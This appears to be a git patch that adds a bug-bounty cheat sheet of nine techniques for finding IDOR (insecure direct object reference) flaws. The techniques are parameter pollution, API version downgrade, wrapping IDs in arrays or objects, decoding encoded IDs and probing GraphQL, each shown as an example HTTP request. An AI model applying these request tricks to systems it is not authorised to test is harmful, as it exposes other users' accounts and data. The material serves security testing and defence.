From 233ec1f5b72071acc98227c1c4bf98fb63bd6ef1 Mon Sep 17 00:00:00 2001
From: Muhammad Daffa <36522826+MD15@users.noreply.github.com>
Date: Fri, 4 Sep 2020 17:41:20 +0700
Subject: [PATCH] Account Takover [1]

Create account IDOR (Insecure direct object references) tips and add 9 tips
---
 IDOR.md | 99 +++++++++++++++++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 99 insertions(+)
 create mode 100644 IDOR.md

diff --git a/IDOR.md b/IDOR.md
new file mode 100644
index 0000000..99e246e
--- /dev/null
+++ b/IDOR.md
@@ -0,0 +1,99 @@
+## IDOR (Insecure Direct Object Reference)
+
+1. Add parameters onto the endpoints for example, if there was
+```html
+GET /api/v1/getuser
+[...]
+```
+Try this to bypass
+```html
+GET /api/v1/getuser?id=1234
+[...]
+```
+
+2. HTTP Parameter pollution
+
+```html
+POST /api/get_profile
+[...]
+user_id=hacker_id&user_id=victim_id
+```
+
+3. Add .json to the endpoint
+
+```html
+GET /v2/GetData/1234
+[...]
+```
+Try this to bypass
+```html
+GET /v2/GetData/1234.json
+[...]
+```
+
+4. Test on outdated API Versions
+
+```html
+POST /v2/GetData
+[...]
+id=123
+```
+Try this to bypass
+```html
+POST /v1/GetData
+[...]
+id=123
+```
+
+5. Wrap the ID with an array.
+
+```html
+POST /api/get_profile
+[...]
+{"user_id":111}
+```
+Try this to bypass
+```html
+POST /api/get_profile
+[...]
+{"id":[111]}
+```
+
+6. Wrap the ID with a JSON object
+
+```html
+POST /api/get_profile
+[...]
+{"user_id":111}
+```
+Try this to bypass
+```html
+POST /api/get_profile
+[...]
+{"user_id":{"user_id":111}}
+```
+
+7. JSON Parameter Pollution
+
+```html
+POST /api/get_profile
+[...]
+{"user_id":"hacker_id","user_id":"victim_id"}
+```
+
+8. Try decode the ID, if the ID encoded using md5,base64,etc
+```html
+GET /GetUser/dmljdGltQG1haWwuY29t
+[...]
+```
+dmljdGltQG1haWwuY29t => victim@mail.com
+
+9. If the website using graphql, try to find IDOR using graphql!
+```html
+GET /graphql
+[...]
+```
+```html
+GET /graphql.php?query=
+[...]
+```